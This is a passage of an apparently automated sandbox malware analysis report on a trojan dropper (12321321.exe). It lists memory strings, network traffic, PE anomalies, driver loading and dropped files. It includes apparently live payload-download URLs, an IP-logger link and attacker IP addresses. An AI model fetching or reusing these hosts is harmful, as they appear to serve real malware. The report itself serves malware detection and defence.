            Source: 12321321.exe, 00000000.00000002.1416136932.0000000000114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exeU
            Source: 12321321.exe, 00000000.00000002.1416136932.0000000000114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exea
            Source: 12321321.exe, 00000000.00000002.1417238504.0000000003680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.240.118.49/forsale/silk.exel
            Source: powershell.exe, 00000003.00000002.1486915723.000001F9E0571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1449748816.000001F918CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000005.00000002.1558035844.000001F928D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000005.00000002.1558035844.000001F928D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000005.00000002.1558035844.000001F928D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: vbc.exe, 00000002.00000002.1397936172.000000014007F000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
            Source: powershell.exe, 00000005.00000002.1449748816.000001F918F17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: vbc.exe, 00000002.00000002.1419458463.000001C612CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/64F2HH
            Source: vbc.exe, 00000002.00000002.1419458463.000001C612CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/64F2HH((p
            Source: 12321321.exe, 00000000.00000002.1416136932.0000000000114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: is-37486.tmp.8.drString found in binary or memory: https://nanoways.com/activate
            Source: is-37486.tmp.8.drString found in binary or memory: https://nanoways.com/activate/?prefill=%hs
            Source: is-37486.tmp.8.drString found in binary or memory: https://nanoways.com/deactivate
            Source: is-37486.tmp.8.drString found in binary or memory: https://nanoways.com/deactivate/?prefill=%hs
            Source: is-37486.tmp.8.drString found in binary or memory: https://nanoways.com/qr/%1
            Source: powershell.exe, 00000003.00000002.1625894793.000001F9F05EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1558035844.000001F928D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2564407826.0000000005D73000.00000004.00001000.00020000.00000000.sdmp, photorecoverylib.exe, 0000000A.00000000.1440851005.0000000000889000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000003.1416863649.0000000002091000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000003.1416786459.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, 00000007.00000002.2563198831.0000000002091000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000003.1419896826.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2563883881.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000003.1420021294.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, 00000008.00000002.2563383349.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
            Source: photorecoverylib.exe, 0000000A.00000000.1440851005.00000000007A4000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.openssl.org/docs/faq.html
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 91.240.118.49:443 -> 192.168.2.5:49697 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.5:49728 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: 12321321.exeStatic PE information: section name: "YR
            PE file has a writeable .text section
            Source: photorecoverylib.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: PhotoRecoveryLib.exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeCode function: 1_2_00007FF7C7B55716 NtUnmapViewOfSection,1_2_00007FF7C7B55716
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0042F594 NtdllDefWindowProc_A,8_2_0042F594
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00423B94 NtdllDefWindowProc_A,8_2_00423B94
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004125E8 NtdllDefWindowProc_A,8_2_004125E8
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00479380 NtdllDefWindowProc_A,8_2_00479380
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0045763C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,8_2_0045763C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,8_2_0042E944
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,7_2_00409448
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,8_2_0045568C
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile created: C:\Windows\Temp\Hmas5kDc_8664.sysJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile deleted: C:\Windows\Temp\Hmas5kDc_8664.sysJump to behavior
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_004037AC0_2_004037AC
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_004057B00_2_004057B0
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_0042B3700_2_0042B370
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_004154E00_2_004154E0
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_0042A4900_2_0042A490
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_004195700_2_00419570
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_004016E00_2_004016E0
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_004227600_2_00422760
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_004049700_2_00404970
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_0042AA300_2_0042AA30
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_00411AC00_2_00411AC0
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_00484B700_2_00484B70
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_00420D700_2_00420D70
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_00482DE00_2_00482DE0
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_00401E800_2_00401E80
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeCode function: 1_2_00007FF7C7B516A51_2_00007FF7C7B516A5
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_0040840C7_2_0040840C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00470C748_2_00470C74
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0043533C8_2_0043533C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004813C48_2_004813C4
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004678488_2_00467848
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004303D08_2_004303D0
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0044453C8_2_0044453C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004885E08_2_004885E0
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004346388_2_00434638
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00444AE48_2_00444AE4
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0048ED0C8_2_0048ED0C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00430F5C8_2_00430F5C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0045F16C8_2_0045F16C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004451DC8_2_004451DC
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0045B21C8_2_0045B21C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004455E88_2_004455E8
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004876808_2_00487680
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0046989C8_2_0046989C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00451A308_2_00451A30
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0043DDC48_2_0043DDC4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_0040100010_2_00401000
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_004067B710_2_004067B7
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_609660FA10_2_609660FA
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6092114F10_2_6092114F
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6091F2C910_2_6091F2C9
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6096923E10_2_6096923E
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6093323D10_2_6093323D
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6095C31410_2_6095C314
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6095031210_2_60950312
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6094D33B10_2_6094D33B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6093B36810_2_6093B368
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6096748C10_2_6096748C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6093F42E10_2_6093F42E
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6095447010_2_60954470
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_609615FA10_2_609615FA
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6096A5EE10_2_6096A5EE
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6096D6A410_2_6096D6A4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_609606A810_2_609606A8
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6093265410_2_60932654
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6095566510_2_60955665
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6094B7DB10_2_6094B7DB
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6092F74D10_2_6092F74D
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6096480710_2_60964807
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6094E9BC10_2_6094E9BC
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6093792910_2_60937929
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6093FAD610_2_6093FAD6
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6096DAE810_2_6096DAE8
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6094DA3A10_2_6094DA3A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60936B2710_2_60936B27
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60954CF610_2_60954CF6
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60950C6B10_2_60950C6B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60966DF110_2_60966DF1
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60963D3510_2_60963D35
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60909E9C10_2_60909E9C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60951E8610_2_60951E86
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60912E0B10_2_60912E0B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60954FF810_2_60954FF8
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DFD0A610_2_02DFD0A6
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DDBAFD10_2_02DDBAFD
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DE2A8010_2_02DE2A80
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DDD32F10_2_02DDD32F
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DD70C010_2_02DD70C0
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DCE08910_2_02DCE089
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DE267D10_2_02DE267D
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DDB60910_2_02DDB609
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DD874A10_2_02DD874A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DDBF1510_2_02DDBF15
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DE0DB410_2_02DE0DB4
            Source: Joe Sandbox ViewDropped File: C:\ProgramData\PhotoRecoveryLib\PhotoRecoveryLib.exe 64458D205E25C3D036172AE30C7C2D214ECF0EAE5BFE18BD99E7011E94748B8E
            Source: Joe Sandbox ViewDropped File: C:\ProgramData\PhotoRecoveryLib\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeProcess token adjusted: Load DriverJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: String function: 00408C1C appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: String function: 00406AD4 appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: String function: 0040596C appears 117 times
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: String function: 00407904 appears 43 times
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: String function: 00403400 appears 60 times
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: String function: 00445E48 appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: String function: 00457FC4 appears 77 times
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: String function: 00457DB8 appears 102 times
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: String function: 00434550 appears 32 times
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: String function: 00403494 appears 85 times
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: String function: 004533B8 appears 98 times
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: String function: 00446118 appears 58 times
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: String function: 00403684 appears 229 times
            Source: C:\Users\user\Desktop\12321321.exeCode function: String function: 00411090 appears 31 times
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: String function: 02DE2A10 appears 135 times
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: String function: 02DD7760 appears 32 times
            Source: 12321321.exeStatic PE information: Resource name: RT_RCDATA type: DOS executable (COM)
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp.7.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
            Source: photorecoverylib.exe.8.drStatic PE information: Resource name: RT_FILE type: PE32+ executable (console) x86-64, for MS Windows
            Source: photorecoverylib.exe.8.drStatic PE information: Resource name: RT_INST type: PE32 executable (EFI application) Intel 80386 (stripped to external PDB), for MS Windows
            Source: photorecoverylib.exe.8.drStatic PE information: Resource name: RT_INST type: PE32+ executable (EFI application) x86-64 (stripped to external PDB), for MS Windows
            Source: is-DH20J.tmp.8.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: is-DH20J.tmp.8.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: is-DH20J.tmp.8.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
            Source: PhotoRecoveryLib.exe.10.drStatic PE information: Resource name: RT_FILE type: PE32+ executable (console) x86-64, for MS Windows
            Source: PhotoRecoveryLib.exe.10.drStatic PE information: Resource name: RT_INST type: PE32 executable (EFI application) Intel 80386 (stripped to external PDB), for MS Windows
            Source: PhotoRecoveryLib.exe.10.drStatic PE information: Resource name: RT_INST type: PE32+ executable (EFI application) x86-64 (stripped to external PDB), for MS Windows
            Source: is-7OE1I.tmp.8.drStatic PE information: Number of sections : 19 > 10
            Source: sqlite3.dll.10.drStatic PE information: Number of sections : 19 > 10
            Source: c9f74e53-58d1-13d2-8abb-0195719b8be2.exe.0.drStatic PE information: No import functions for PE file found
            Source: 001[1].exe.0.drStatic PE information: No import functions for PE file found
            Source: 12321321.exeBinary or memory string: OriginalFilename vs 12321321.exe
            Source: 12321321.exe, 00000000.00000000.1288503301.000000000066D000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename: vs 12321321.exe
            Source: 12321321.exe, 00000000.00000002.1416753173.000000000066D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename: vs 12321321.exe
            Source: 12321321.exeBinary or memory string: OriginalFilename: vs 12321321.exe
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeDriver loaded: \Registry\Machine\System\CurrentControlSet\Services\Sgnk28N_8664Jump to behavior
            Source: Hmas5kDc_8664.sys.2.drBinary string: \Device\Udp6\Device\Udp\Device\Tcp6\Device\Tcp
            Source: Hmas5kDc_8664.sys.2.drBinary or memory string: .SLNKa
            Source: classification engineClassification label: mal100.troj.evad.winEXE@18/49@0/5
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_02DCF8D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,10_2_02DCF8D0
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,7_2_00409448
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,8_2_0045568C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00455EB4 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,8_2_00455EB4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: CloseServiceHandle,CreateServiceA,CloseServiceHandle,CloseServiceHandle,10_2_004016EB
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_004025A0 CreateToolhelp32Snapshot,Process32First,lstrcmpi,Process32Next,lstrcmpi,CloseHandle,CloseHandle,0_2_004025A0
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0046E5B8 GetVersion,CoCreateInstance,8_2_0046E5B8
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_004057B0 FindResourceA,LoadResource,SizeofResource,LockResource,strlen,strlen,CreateFileA,WriteFile,CloseHandle,CloseHandle,0_2_004057B0
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_0040DCE3 StartServiceCtrlDispatcherA,10_2_0040DCE3
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_0040DCE3 StartServiceCtrlDispatcherA,10_2_0040DCE3
            Source: C:\Users\user\Desktop\12321321.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\001[1].exeJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8896:120:WilError_03
